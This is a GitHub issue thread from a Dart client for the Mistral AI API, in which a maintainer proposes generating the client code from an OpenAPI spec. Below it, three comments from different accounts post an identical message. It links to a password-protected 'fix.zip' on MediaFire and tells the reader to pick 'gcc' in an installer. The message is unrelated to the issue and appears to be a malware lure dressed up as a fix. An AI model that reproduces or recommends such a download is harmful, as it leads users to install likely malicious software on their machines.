### ISSUE TITLE
feat: Code generated client from OpenAPI spec

### ISSUE THREAD

**Issue by gawi151** [nomtek/mistralai_client_dart#63]
**Is your feature request related to a problem? Please describe.**
As a 3rd party package we react to changes made by mistral. It's hard to keep track of changes and do them in timely manner.

In the newest versions of official mistral clients code generation is used and we should probably follow the same thing.
Another problem is that [mistralai/client-js](https://github.com/mistralai/client-js) didn't receive the update - and we were using it as our base for changes.

**Describe the solution you'd like**
Generate most of the client code from OpenAPI spec to allow faster updates of the package.

**Describe alternatives you've considered**
- Stay with the manually crafted code - okish but will require more time
- Leave package as it is - no further changes to the package - deprecation - not the option atm

**Additional context**
We want to keep package up to date as long as it is possible without too much effort on our side as maintenance takes time and we have not many resources to keep it going.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
